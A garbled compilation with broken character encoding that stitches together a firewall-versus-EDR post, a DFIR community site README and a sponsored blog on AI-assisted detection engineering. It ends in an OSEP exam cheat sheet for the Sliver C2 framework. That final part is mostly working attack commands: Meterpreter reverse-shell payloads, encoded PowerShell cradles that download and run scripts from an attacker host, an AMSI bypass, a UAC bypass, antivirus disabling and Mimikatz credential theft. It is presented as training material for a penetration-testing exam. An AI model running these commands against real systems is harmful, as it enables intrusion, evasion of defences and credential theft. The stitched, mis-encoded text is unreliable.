Kali Linux Cheat Sheet โ Essential Commands & Tools 100 Forensics Tools ๐จ ๐๐ถ๐ฟ๐ฒ๐๐ฎ๐น๐น ๐๐ ๐๐๐ฅ : ๐ก๐ฒ๐๐๐ผ๐ฟ๐ธ ๐๐ ๐๐ป๐ฑ๐ฝ๐ผ๐ถ๐ป๐ ๐ฆ๐ฒ๐ฐ๐๐ฟ๐ถ๐๐ ๐๐
๐ฝ๐น๐ฎ๐ถ๐ป๐ฒ๐ฑ Follow House of SOC for more resources. In cybersecurity, Firewalls and EDRs serve as two crucial defense layers but they protect different territories. ๐๐ถ๐ฟ๐ฒ๐๐ฎ๐น๐น : โข Acts as a gatekeeper between your internal network and the outside world. โข Filters incoming/outgoing traffic based on predefined rules. โข Best for preventing external attacks before they reach endpoints. โข Key features: Packet filtering, Stateful inspection, VPN support. ๐๐๐ฅ ( ๐๐ป๐ฑ๐ฝ๐ผ๐ถ๐ป๐ ๐๐ฒ๐๐ฒ๐ฐ๐๐ถ๐ผ๐ป & ๐ฅ๐ฒ๐๐ฝ๐ผ๐ป๐๐ฒ ): โข Monitors and analyzes endpoint activities for suspicious behavior. โข Detects advanced threats that bypass firewalls or originate internally. โข Offers real-time monitoring, behavioral analysis, and automated responses. Firewall = Prevents entry EDR = Detects and responds inside Together, they form a layered security defense, keeping both your network perimeter and internal devices protected. Kubernetes Exploitation 101: Pentesting Complete Guide for Beginners - Link: https://lnkd.in/d4EGzhkf Credit: HackTricks Cloud - Link: https://lnkd.in/dzEbHE2N Incident Response Chaos Club A community-driven DFIR (Digital Forensics & Incident Response) knowledge aggregator Project Goal We're solving a fundamental problem in the DFIR community: The Problem: Finding quality DFIR content is fragmented and frustrating. Security researchers and practitioners either: ๏ท Don't publish their knowledge due to lack of website expertise or resources ๏ท Publish on scattered personal blogs that are hard to discover and track Our Solution: irchaos.club serves as a centralized DFIR knowledge aggregator where security professionals can: ๏ท Publish directly on our platform with full Markdown support ๏ท Create external link entries to showcase content hosted elsewhere ๏ท Gain visibility through our growing community ๏ท Discover quality content in one centralized location Whether you're sharing malware analysis, incident response procedures, threat hunting techniques, or security research, IRChaos Club provides the platform and audience your work deserves. Quick Start Prerequisites ๏ท Node.js 18.x or later ๏ท npm or yarn Local Development 1. Clone the repository 2. git clone https://github.com/irchaosclub/irchaosclub.github.io.git cd irchaosclub.github.io 3. Install dependencies 4. npm install 5. # or yarn install 6. Start the development server 7. npm run dev 8. # or yarn dev 9. Open your browser Navigate to http://localhost:3000 to see the site running locally. Build for Production npm run build npm run start Contributing Content Want to share your DFIR knowledge with the community? We have two ways to contribute. Check the Wiki For detailed instructions on adding articles, please visit our Wiki which covers: ๏ท Direct Articles : How to write and publish full articles on the platform ๏ท External Links : How to create entries that link to your existing blog posts ๏ท Formatting Guidelines : Markdown syntax, image handling, and styling ๏ท Metadata & Tags : Proper categorization for discoverability Quick Overview 1. Direct Articles : Create a new .md file in /content/your-article-name/ 2. External Links : Add frontmatter with external: "https://your-blog.com/post" 3. Images : Place in /public/images/your-article-name/ 4. Submit : Create a pull request with your content Tech Stack ๏ท Framework : Next.js 13+ with App Router ๏ท Content : Contentlayer for Markdown processing ๏ท Styling : Tailwind CSS + shadcn/ui ๏ท Deployment : GitHub Pages with static export ๏ท Language : TypeScript Project Structure irchaosclub.github.io/ โ โโ content/ # Blog posts and articles โ โ โโ your-article/ โ โ โ โโ index.md # Article content โ โ โโโ images/ # Article-specific images โ โโ src/ โ โ โโ components/ # React components โ โ โโ pages/ # Next.js pages โ โ โโ styles/ # Global styles โ โโโ lib/ # Utility functions โ โโ public/ โ โโโ images/ # Static images โ โโ contentlayer.config.ts # Content processing config โโโ next.config.js # Next.js configuration Community ๏ท Website : irchaos.club ๏ท GitHub : irchaosclub ๏ท Issues : Report bugs or request features ๏ท Discussions : Community discussions License This project is open source and available under the MIT License Acknowledgments Special thanks to all the security researchers, incident responders, and DFIR practitioners who contribute their knowledge to make our community stronger. How AI Transforms Detection Engineering From Narrow Precision to Broad Coverage Filip Stojkovski Oct 14, 2025 Disclaimer: Opinions expressed are solely my own and do not reflect the views or opinions of my employer or any other affiliated entities. Any sponsored content featured on this blog is independent and does not imply endorsement by, nor relationship with, my employer or affiliated organisations. Part 1 of 3: The Detection Coverage Problem and How AI Solves It Your SOC processes ten thousand alerts daily. Your detection engineer just wrote a brilliant new rule detecting lateral movement via WMI, but hereโs what happens next: They look at the alert volume and realize it generates two hundred potential hits per day. They know your team can realistically investigate maybe twenty alerts per day for this detection type, so they start making the rule more restrictive. They add filters, raise thresholds, and narrow the scope until the alert volume drops to something manageable. In doing so, theyโve just created a blind spot. Those one hundred and eighty alerts they filtered out might contain real threats, but your process design forced them to choose between overwhelming the team and potentially missing attacks. This is the fundamental problem we need to solve. Your processes were designed for human-in-the-loop execution, and that constraint is now the bottleneck strangling your security effectiveness. This edition is sponsored by AiStrike AI SOC Done Right! AI SOC Intelligence Fabric that unifies your data, accelerates investigations, and orchestrates intelligent response Transform your SOC with composite AI that arrives pre-trained and ready to work. Enable small teams to operate like enterprise SOCs while giving enterprises state-of-the-art incident response capabilities. What changed today Today's AI wave is not a plug-and-play upgrade for security operations. Just as the shift to cloud and SaaS forced organizations to realign processes, roles, and governance, the AI wave demands a full reboot of your people-process-technology stack. This isn't about adding a new tool to your existing workflows. This is about fundamentally rethinking how security operations function when you remove the human throughput constraint from the equation. The Research Backs This Up Recent research reveals an uncomfortable truth: data quality predicts success more than raw technology capacity, and process design often outweighs management intent in driving integration [1] . Meanwhile, cybersecurity researchers are exploring human-AI co-teaming models in SOCs, stressing the need for dynamic autonomy, trust calibration, and feedback loops in operational workflows [2] The crux: Dropping AI into a rigid SOC is like installing a jet engine on a cart with square wheels. The power is there, but the system isn't designed to harness it. What's Really Changing Every major technology wave forces security teams to renegotiate the relationship between people, process, and technology: ๏ท Cloud era: Reinvented access models, monitoring pipelines, identity governance ๏ท SaaS era: Adapted to distributed ownership and ephemeral infrastructure ๏ท AI era: Must handle systems that don't just observe, they act, decide, and recommend The challenge isn't visibility anymore. It's an agency. AI systems don't just help us monitor threats; they investigate, triage, and recommend actions. That shift means SOC processes can't remain static, checklists written for human cognition. They must become machine-executable logic that adapts to model confidence, context, and risk. The Brutal Trade-Off: Killing Your Detection Coverage Traditional detection engineering operated under constraints that forced you to sacrifice coverage for operational feasibility. Let me show you what this looks like in practice. The Typical Detection Engineering Process Here's how it actually works: 1. Developp hypothesis about a threat you want to detect 2. Build a detection rule to identify that behavior 3. Test against your environment to see alert volume 4. See 100 alerts per day ๐ฐ 5. Realize your team can only handle 20 alerts per day 6. Make the detection more restrictive (add filters, raise thresholds) 7. Deploy detection that catches 40% of attack variants instead of 90% You weren't optimizing for security effectiveness. You were optimizing for operational survival. Understanding the Funnel of Fidelity Zack Allen in the Detection Field Manual #3 talks about detection efficency concept of the Funnel of Fidelity ( introduce by Jared Atkinson back in 2019) to describe this exact problem [3] : massive data volume at the top, limited analyst capacity at the bottom. Every alert that survives the funnel consumes human focus, creating an inherent trade-off between comprehensive detection and operational sustainability. This creates a dangerous dynamic. You might achieve eighty percent detection coverage , meaning your rules can theoretically identify eighty percent of relevant security events in your environment. However, analyst capacity constraints mean you can only thoroughly investigate fifty or sixty percent of the alerts those detections generate. Your effective security coverage isn't 80%, it's the 40-50% that actually receives quality investigation. The Attacker's Advantage This coverage gap becomes an exploitable vulnerability. Attackers need only operate in the 20-30% of alert volume that your team doesn't have the capacity to investigate. They can: ๏ท Generate low-level alerts that get suppressed automatically ๏ท Operate during high-volume periods when your team is overwhelmed ๏ท Use techniques that generate alerts your team habitually ignores due to high false positive rates The gap between what you detect and what you investigate is where attackers live. How AI Changes the Detection Engineering Equation When investigation capacity increases from 20 alerts per analyst per day to thousands of alerts per AI agent per day, everything changes. You can finally deploy the detections you always wanted to build. Before vs. After: The Transformation Before AI After AI Detection generates 100 alerts/day Detection generates 100 alerts/day Team can handle 20/day AI triages all 100 80 alerts ignored or suppressed 70 auto-closed (benign activity + false positives) Must narrow detection scope 20 escalated (ambiguous, with full context) Catches 40% of attack variants 10 true positives flagged (ready for response) Catches 90% of attack variants The Key Shift With AI, you move from precision-optimized detection to coverage-optimized detection Precision-optimized (old way): ๏ท Question: "How can I make this detection narrow enough to be sustainable?" ๏ท Result: Restrictive filters, high thresholds, missed attack variants ๏ท Coverage: 30-40% of the actual threat landscape Coverage-optimized (new way): ๏ท Question: "How can I make this detection broad enough to catch all variants while maintaining signal quality?" ๏ท Result: Comprehensive coverage, AI handles triage burden ๏ท Coverage: 85-95% of the actual threat landscape The detection engineer's job transforms completely. Instead of adding restrictive filters to reduce volume, she focuses on adding context that helps the AI make accurate disposition decisions. Instead of tuning for low volume, she tunes for high recall, knowing the AI can handle the resulting triage burden. [4] Understanding the Alert Categories (Updated section : Thank you Nathan Eades for the feedback) When we talk about the triage burden, we're actually dealing with two distinct categories: Benign Alerts : The detection is working correctly; it identified the behavior it was designed to catch. But the activity is legitimate, authorized, or expected. ๏ท Example: Your lateral movement detection correctly flags WMI activity, but it's authorized IT maintenance during a change window ๏ท Problem: Requires context to distinguish legitimate from malicious False Positives : The detection is firing incorrectly due to overly broad rules or environmental noise. ๏ท Example: Your detection fires on normal admin behavior because it doesn't account for privileged user patterns ๏ท Problem: The detection rule itself needs tuning Traditional SOCs struggled with both: ๏ท Benign alerts required manual context gathering (check change tickets, verify with user, confirm authorization) ๏ท False positives required detection tuning, but that tuning often meant narrowing the rule and missing real threats AI handles both categories intelligently: ๏ท For benign alerts: AI gathers context automatically (change windows, user roles, business justification) to determine legitimacy ๏ท For false positives: AI identifies systematic patterns and suggests detection improvements The result: You can deploy broader detections because AI can distinguish between malicious activity, benign activity, and false positives at scale. The Transformation in Detection Philosophy This isn't just about automation making things faster. It's a fundamental shift in how you approach detection engineering. Traditional Detection Engineering Guiding questions: ๏ท Will this detection generate too many alerts? ๏ท Can our team handle the volume? ๏ท How can I make this more restrictive without losing too much coverage? Optimization goal: Operational sustainability Trade-off: Coverage sacrificed for precision Result: Narrow detections that miss attack variants AI-Enabled Detection Engineering Guiding questions: ๏ท Does this detection catch the full breadth of attacker behavior? ๏ท What context does AI need to make accurate triage decisions? ๏ท How can I optimize for recall without sacrificing signal quality? Optimization goal: Security effectiveness Trade-off: Let AI handle triage burden, focus on coverage Result: Broad detections that catch attack variants while maintaining a manageable analyst workload Key Metrics That Change Traditional metrics focused on volume management: ๏ท โ Alerts per day per detection ๏ท โ Analyst handling capacity ๏ท โ Alert-to-incident ratio New metrics focus on coverage and learning: ๏ท โ Detection recall: Of all malicious events, how many did we catch? ๏ท โ AI triage accuracy: Of AI's auto-close decisions, what percentage are correct? ๏ท โ Analyst amplification: How many alerts can each analyst effectively handle with AI assistance? ๏ท โ Feedback utilization: Is analyst feedback improving AI accuracy over time? What This Means for Your SOC The transformation from narrow, precision-focused detections to broad, coverage-optimized detections has implications that ripple through your entire security operations: For Detection Engineers New responsibilities: ๏ท Build comprehensive detections without volume anxiety ๏ท Add context and enrichment logic to help AI triage ๏ท Focus on recall and coverage rather than precision and volume ๏ท Monitor AI triage performance and tune based on feedback Time allocation shift: ๏ท Less: Manual alert triage to validate detection quality ๏ท More: Detection development, coverage expansion, AI tuning For SOC Analysts New workflow: ๏ท Receive 20-30 pre-investigated cases per day instead of 200+ raw alerts ๏ท Each case includes a full context gathered by AI ๏ท Focus on judgment call and let the AI do the data gathering ๏ท Provide feedback that improves AI over time ( updated section, thank yo,u Roger W. Roberts , for the feedback) For Security Outcomes Coverage improvement: ๏ท From: 40-50% effective coverage (detect 80%, investigate 50%) ๏ท To: 75-80% effective coverage (detect 80%, investigate 95%) The Bottom Line The shift from playbooks to agentic systems will be messy but inevitable. AI is pulling SOCs from static logic toward adaptive, self-improving systems. If the cloud era abstracted infrastructure, the AI era abstracts decision-making. Our processes must now teach machines how to operate within boundaries, not just describe what humans should do. That's not automation. That's architecture. But here's the critical insight: This only works if you redesign your processes to take advantage of it. Deploying broader detections into your current manual triage process just creates a bigger backlog. You need to transform how you handle the resulting alerts. That's where machine-executable investigation procedures come in. Coming in Part 2: From PDF Playbooks to Machine-Executable Logic Broader detection coverage only works if your investigation procedures can handle the volume. In Part 2 , we'll explore the transformation that makes this possible: You'll learn: ๏ท Why your current SOPs don't work for AI (and what to do about it) ๏ท How to convert human-readable playbooks into machine-executable logic ๏ท A complete example: Suspicious login investigation (before and after) ๏ท How does this transformation change the coverage funnel from 50% to 100% triage ๏ท What this means operationally for your SOC team The process tof ransformation is just as critical as technology. Get the SOP design wrong, and your AI will be making decisions based on incomplete or inconsistent logic. Get it right, and you unlock comprehensive coverage that was previously impossible. Next week, we'll show you exactly how to do it. Vendor Spotlight: AiStrike Recently, I had the opportunity to demo AIStrike , and what immediately stood out was how the platform delivers full AI SOC capabilities built on three foundational pillars that directly address the transformation we've been discussing. Pillar 1: The SOC Force Multiplier For Your People: AIStrike transforms a small team into an enterprise-grade SOC capability. If you're currently relying on an MDR, this platform lets you bring that intelligence in-house, giving you more control at a lower cost. ๏ท Transform three analysts into a 30-person SOC capability ๏ท Reduce alert fatigue dramatically ๏ท Elevate junior analysts to perform like seniors ๏ท Free senior analysts for strategic threat hunting and detection engineering For Your Technology: This is a technology enabler, not a rip-and-replace project. AIStrike unlocks the value of your existing security stack through extensive pre-built integrations and orchestration across all your tools. No need to abandon your current investments. Pillar 2: Investigation Depth, Not Just Speed AIStrike doesn't just summarize alerts; it builds the complete investigation story. This is exactly what we discussed: comprehensive context gathering that enables the 30% โ 95% coverage improvement in our credential stuffing example. The platform delivers: ๏ท Automated enrichment from identity providers, threat intel, and EDR platforms ๏ท VPN logs, user behavior patterns, and threat intelligence are pulled simultaneously ๏ท Your organization's risk policies are applied to make disposition decisions ๏ท Pre-investigated cases with full context, reducing investigation time from 30 minutes to 5 minutes What this means practically: Deploy those comprehensive detections (500 alerts/day). AIStrike's AI triages all 500, auto-closes the 420 false positives with documented reasoning, escalates the 60 ambiguous cases with context, and flags the 20 true threats for immediate response. Pillar 3: Continuous Intelligence Loop This is the self-tuning SOC we've been describing, a feedback loop that sharpens over time: ๏ท Pre-trained on millions of security events ๏ท Learns from your environment without disruption ๏ท Self-tunes to reduce noise over time ๏ท Adapts to emerging threats automatically ๏ท Captures analyst feedback and decisions ๏ท Tracks AI performance metrics to show measurable improvement The result: Your SOC gets progressively smarter as the AI learns which signals matter most in your specific environment. Your detection engineers can finally optimize for recall instead of precision, knowing the AI will handle the triage burden intelligently. Learn more: AIStrike.com Sliver CheatSheet for OSEP - Link: https://lnkd.in/dSt9ynDP Credit: Syed Umar Arfeen - Link: https://lnkd.in/dyHuNndr Sliver CheatSheet for OSEP Creating this repository to help people with usage of Sliver C2 for OSEP. The guide is specific to OSEP but the usage should remain the same for real world projects. It is supposed to be treated as a cheatsheet for when you want to get something done and not want to spend time reading the documentation. It contains all the notes from the course content and challenge labs and is more than enough to do them and pass the exam. The notes are categorised by initial setup, compromise, privileges escalation, post exploitation and other sections. The C# and PowerShell files throughout the cheat sheet should be publicly accessible, just search the tool name publicly. I have also compiled many of them during the duration of OSEP prep and have included them within the folder bins containing my structure, these would be detected as malicious if downloaded, feel free to download from the public repos and compile them. Table of Contents ๏ท Table of Contents ๏ท Q & A ๏ท Installation o Server o Client o Armory packages ๏ท Generic o Hosts File o Nmap Scanning o Dirsearch ๏ท Initial Foothold o Listeners o Payloads o Implant Duplication & Migration ๏ท Bypasses o AMSI & CLM ๏ง SharpSh ๏ง Stracciatella o Application Whitelisting ๏ท Privileges Escalation o Checks o Modifiable Service o SeImpersonatePrivileges o AlwaysInstallElevated o UAC Bypass ๏ง ComputerDefaults ๏ง Fodhelper ๏ท Privileged User - Post-Exploitation o Flags o Enable RDP o Enable WinRM o Disable Defender & Firewall o Persistence o Restarting the machine ๏ท Credentials Dumping o Mimikatz ๏ง Disable LSA protection ๏ง Machine Credentials ๏ง PEZor - Mimikatz o LaZagne o impacket-secretsdump o nxc o SharpKatz o Password Spraying ๏ท Token Creation & Stealing o PassTheHash PTH ๏ง Mimikatz - PWSH port ๏ง Mimikatz - PEZor ๏ง SharpNamedPipePTH o make-token o netexec o runas ๏ง Injection ๏ง Direct Shell o Rubeus createnetonly o $cred in pwsh o Steal Token ๏ง migrate ๏ง execute-shellcode ๏ง SharpImpersonation ๏ง Msfconsole ๏ท Tunneling o Portfwd o Reverse Port Forwarding o Socks5 Proxy o Ligolo ๏ง Subnet Access ๏ง Port Forwarding through Ligolo ๏ท Lateral Movement o BOF - whoami o PsExec o jump-psexec o jump-wmiexec o SharpRDP ๏ท Domain Enumeration o Laps o SharpHound ๏ง Linux o PingCastle o ADPeas o Trusts ๏ง PowerView ๏ง ADSearch o Shares Enumeration ๏ง SharpShares ๏ง Snaffler ๏ท Domain Exploitation o Persistence o Kerberoasting o ACLs Abuse ๏ง ForcePasswordChange on User ๏ง GenericWrite on User ๏ง WriteDacl on Group ๏ง Windows Abuse ๏ง Linux Abuse o Unconstrained Delegation o Constrained Delegation ๏ง Machine ๏ง User ๏ง Linux o RBCD ๏ง GenericWrite ๏ท Silver Ticket o Windows o Linux ๏ท Domain Lateral Movement o Password Change o Golden Ticket ๏ง Child Domain to Parent Domain ๏ง Parent Domain to Child Domain ๏ท MSSQL o SQLMap o Queries o MSSQLand ๏ง Add Custom Command o MSSQLpwner o SQLRecon ๏ง Links Exploitation ๏ง MSSQL - Relaying & Impersonation o PowerUPSQL ๏ท Armory o SharpLaps o SharpView o SharpHound o SharpSecDump o sharpsh o SharpMapExec o SharpUp o SharpRDP o Rubeus o NoPowerShell o Sharp-SMBExec o SharpDPAPI o SharpWMI ๏ท BOFs o jump-psexec o jump-wmiexec ๏ท Armory Packages List ๏ท Credits Q & A ๏ท When I run armory packages with -i, I get CLM runtime error, how to resolve? o Run the same command again, twice, thrice, it will work out ๏ท Sliver hangs when I run ligolo or other binaries, how to resolve? o Press Ctrl + C and then re-run sliver and use the session being used o Run any commands, it should work fine, ligolo process should keep running within the background ๏ท SweetPotato shell dies right after I receive it, how to resolve? o The moment you get the shell either ๏ง Run phollow or ๏ง Disable AV using the oneliner of sharpsh o Repeat the above two steps (the AV disablement is favoured to process hollowing) ๏ท I can't figure out sliver quote issues o Same lol but with enough practice and time waste, you'll get it o Base64 encode where supported using cyberchef, that should iron out a lot of isses ๏ท Why is there a hav0c-ps.txt file everywhere? o I got lazy and didn't change the name as I was using Havoc before Sliver o Should be present within https://github.com/Anon-Exploiter/sliver-cheatsheet/blob/main/ bins/www/html/hav0c-ps.txt Installation Visit the sliver releases page and install the pre-compiled Server and Client for your OS. Sliver also enables multiple operators to join using profiles since each operator can be generated using a different profile. Server # Install suitable Binary for your OS - Linux in this instance wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-server_linux chmod +x ./sliver-server_linux ./sliver-server_linux # Operator profile [server] sliver > new-operator -n <operator_name> -l <listening_IP> [*] Generating new client certificate, please wait ... [*] Saved new client config to: /<path_to_generated_profile>/<operator_name>_<listening _IP>.cfg # Enabling Multiplayer mode [server] sliver > multiplayer [*] Multiplayer mode enabled! [*] <operator_name> has joined the game Note : Without enabling the multiplayer mode, no one else will be able to connect to Sliver's server. Client Setting up the Sliver C2 client to connect with the server # Download the sliver client wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.42/sliver-client_linux chmod +x ./sliver-client_linux ./sliver-client_linux import /<path_to_generated_profile>/<operator_name>_<listening _IP>.cfg # After importing the profile, start the client ./sliver-client_linux Armory packages Armory contains a set of pre-installed .NET binaries ready to use for the client and server component. sliver > armory install all ? Install 21 aliases and 140 extensions? Yes [*] Installing alias 'SharPersist' (v0.0.2) ... done! ... Complete output at the end ... Generic Hosts File Resolves all ips to fqdn within the network based on protocols and adds entry within /etc/hosts to not add them manually. cd ~/tools/ git clone https://github.com/eMVee-NL/UpdateHostsFile cd UpdateHostsFile sudo python Update-Hosts-File.py --protocols smb,rdp --subnet 192.168.130.0/24 sudo python Update-Hosts-File.py --protocols smb,rdp --subnet 172.16.130.0/24 Note : This will not create domain entries for domain controllers. Nmap Scanning nmap -p- -sC -sV -A -Pn -n --open --append -oN 10.10.200.100 10.10.200.100 Dirsearch dirsearch -u http://10.10.200.100/ -t 100 --full-url -x 404 Initial Foothold Listeners # Sliver listeners # 64 bit shell profiles new --http 10.10.10.11:8088 --format shellcode osep stage-listener --url tcp://10.10.10.11:4443 --profile osep http -L 10.10.10.11 --lport 8088 # 32 Bit shell profiles new --http 10.10.10.11:9090 --format shellcode -a x86 osepx86 stage-listener --url tcp://10.10.10.11:5553 --profile osepx86 http -L 10.10.10.11 --lport 9090 # Lateral movement profiles new --http 10.10.10.11:8099 --format service osep-lateral http -L 10.10.10.11 --lport 8099 Payloads To be used with files in the payloads directory: https://github.com/Anon-Exploiter/sliver-cheatsheet/tree/ main/payloads - Using the oneliners, you no longer need to later on XOR encrypt your shellcode manually using the course given C# code. XOR encryption with 2 # Payloads # 64 bit shell sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw -o /home/kali/OSEP/hav0c/sliver.x64.bin # PowerShell Payload sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; print("[Byte[]] $buf = " + ",".join([f"0x{(int(x, 16) ^ key):02X}" for x in sys.stdin.read().split()]))' # C# sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] buf = new byte[{len(encrypted)}] {{ " + ", ".join([f"0x{b:02X}" for b in encrypted]) + " };")' # ASPX Payloads sudo msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4443 EXITFUNC=thread -f raw | python3 -c 'key = 2; import sys; data = sys.stdin.buffer.read(); encrypted = bytes([b ^ key for b in data]); print(f"byte[] vL8fwOy_ = new byte[{len(encrypted)}] {{ " + ",".join([f"0x{b:02X}" for b in encrypted]) + " };")' # VB - XOR payload="cv2.docm" python3 -c "payload=\"$payload\"; print(''.join(f'{ord(char) + 17:03}' for char in payload))" payload="powershell -exec bypass -nop -w hidden -c iex((new-object system.net.webclient).downloadstring('http://10.10.10.11/hav0c-ps.txt'))" python3 -c "payload=\"$payload\"; print(''.join(f'{ord(char) + 17:03}' for char in payload))" # PowerShell Session echo -en "(New-Object System.Net.WebClient).DownloadString('http://10.10.10.11/hav0c-ps.txt') | IEX" | iconv -t UTF-16LE | base64 -w 0 powershell -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUA bgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4 AMQAwAC4AMQAwAC4AMQAxAC8AaABhAHYAMABjAC0AcABzAC4AdAB4AHQAJwApACAAfAAgAEkARQBYAA= = # -- # 32 bit shell sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw - o /home/kali/OSEP/hav0c/sliver.x86.bin # VBS payload sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; data = [str(int(x, 16) ^ key) for x in sys.stdin.read().split()]; chunk_size = 50; chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]; print("buf = Array(", end=""); print(", _\n".join([", ".join(chunk) for chunk in chunks]) + ")")' # PowerShell payload sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5553 EXITFUNC=thread -f raw | xxd -ps -c 1 | python3 -c 'import sys; key = 2; print("[Byte[]] $buf = " + ",".join([f"0x{(int(x, 16) ^ key):02X}" for x in sys.stdin.read().split()]))' Sliver implant # Create listener (if one doesn't exist already) profiles new --http 10.10.10.11:8088 --format shellcode osep http -L 10.10.10.11 --lport 8088 # Generate beacon .exe generate beacon --http 10.10.250.10:8088 --name sliver.obfuscated --os windows --seconds 5 --jitter 0 -- evasion Implant Duplication & Migration # Launch either x64 or x86 version of notepad according to beacon process execute C:\\windows\\system32\\notepad.exe execute -T notepad execute C:\\windows\\SysWOW64\\notepad.exe # Launching process with rubues rubeus -t 20 -- createnetonly /program:C:\\windows\\SysWOW64\\notepad.exe rubeus -t 20 -- createnetonly /program:C:\\windows\\system32\\cmd.exe # Get process pid (usually last process) ps -e notepad # Get explorer's pid for stability ps -e explorer # Migrate into the created process (two ways, migrate or execute-shellcode) # This works the best on x86 with AV migrate -p 3532 # x86 - Using -A or without, makes no difference, sliver automatically detects the arch for 32 bit execute-shellcode -A 386 -p 1524 /home/kali/OSEP/hav0c/sliver.x86.bin execute-shellcode -p 6896 /home/kali/OSEP/hav0c/sliver.x86.bin # x64 - ShikataGaNai execute-shellcode -p 5544 /home/kali/OSEP/hav0c/sliver.x64.bin execute-shellcode -S -r -I 10 -p 9088 /home/kali/OSEP/hav0c/sliver.x64.bin # Process Hollowing - works really well (recommended) hollow svchost.exe /home/kali/OSEP/hav0c/sliver.x64.bin ## You may get the following error using `hollow` but the shell will be received regardless [!] Call extension error: rpc error: code = Unknown desc = The parameter is incorrect. Bypasses AMSI & CLM SharpSh Lots of usage/examples in upcoming commands for enumeration # Running a single command sharpsh -t 20 -- '-c "whoami /all"' sharpsh -t 20 -- '-c "$ExecutionContext.SessionState.LanguageMode"' # Running a script from remote address (without args) - just pass 1 as the arg as it requires something or won't run sharpsh -t 200 -- '-u http://10.10.10.11/powershell-scripts/Footholder-V3.ps1 -c 1' # Running a script from remote address (with args) sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/PowerUp.ps1 -c "Invoke-AllChecks"' sharpsh -t 200 -- '-u http://10.10.10.11/powershell-scripts/HostRecon.ps1 -c "Invoke-HostRecon"' # Encoding of commands with lots of quotes (use cyberchef) New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" - Value "" -Force sharpsh -- -e -c TmV3LUl0ZW1Qcm9wZXJ0eSAiSEtDVTpcc29mdHdhcmVcY2xhc3Nlc1xtcy1zZXR0aW5nc1xzaGVsbFxvcGVu XGNvbW1hbmQiIC1OYW1lICJEZWxlZ2F0ZUV4ZWN1dGUiIC1WYWx1ZSAiIiAtRm9yY2U= # Running commands with length > 256 characters - Sliver uses donut on backend which only supports 256 chars, run within process using `-i` Invoke-Mimikatz -Command "privilege::debug token::elevate `"sekurlsa::pth /user:Administrator /domain:domain.com /ntlm:ffffffffffffffffffffffffffffffff`" exit" sharpsh -i -t 40 -- -u 'http://10.10.10.11/powershell-scripts/Invoke-Mimikatz.ps1' -e -c SW52b2tlLU1pbWlrYXR6IC1Db21tYW5kICJwcml2aWxlZ2U6OmRlYnVnIHRva2VuOjplbGV2YXRlIGAic2VrdXJsc 2E6OnB0aCAvdXNlcjpBZG1pbmlzdHJhdG9yIC9kb21haW46aW5maW5pdHkuY29tIC9udGxtOjVmOTE2M2Nh M2I2NzNhZGZmZjI4MjhmMzY4Y2EzNzYwYCIgZXhpdCI= Stracciatella Same args as SharpSh execute-assembly -i /home/kali/tools/bins/csharp-files/Stracciatella.exe -c "$ExecutionContext.SessionState.LanguageMode" Application Whitelisting Sliver can run C# bins within the current process so we can use all those to enumerate, two ways: ๏ท use the argument -i with execute-assembly ๏ท inline-execute-assembly # execute-assembly sharpup -- audit sharpup -i -- audit execute-assembly -i -- /home/kali/tools/bins/csharp-files/SharpUp.exe audit # inline-execute-assembly inline-execute-assembly /home/kali/tools/bins/csharp-files/SharpUp.exe audit Privileges Escalation Checks For application whitelisting, add -i for inline-execution # Check privs - using BOF or with execute sa-whoami execute -o whoami /all # Enumerate permissions seatbelt -- -group=all seatbelt -- -group=user # Run sharpup to audit sharpup -- audit sharpup -i -- audit # Run PowerUp sharpsh -t 40 -- '-u http://10.10.10.11/powershell-scripts/PowerUp.ps1 -c "Invoke-AllChecks"' # We can modify a service, check Get-ServiceAcl what we can modify/create sharpsh -t 20 -- '-u http://10.10.10.11/powershell-scripts/Get-ServiceAcl.ps1 -c "Get-ServiceAcl -Name SNMPTRAP | select -expand Access"' # Check Registry for autologon reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # HostRecon sharpsh -t 200 -- '-u http://10.10.10.11/powershell-scripts/HostRecon.ps1 -c "Invoke-HostRecon"' # Footholder-V3.ps1 sharpsh -t 200 -- '-u http://10.10.10.11/powershell-scripts/Footholder-V3.ps1 -c 1' # winPEAS - 400 secs wait - better to do interactively sharpsh -t 400 -- '-u http://10.10.10.11/powershell-scripts/winPEAS.ps1 -c 1' # Winpeas - With oneliner AMSI bypass shell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}}; $d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}}; $g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0); [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) iex((new-object system.net.webclient).downloadstring('http://10.10.10.11/powershell-scripts/ winPEAS.ps1')) # Load within powershell itself (when required) powershell -ep bypass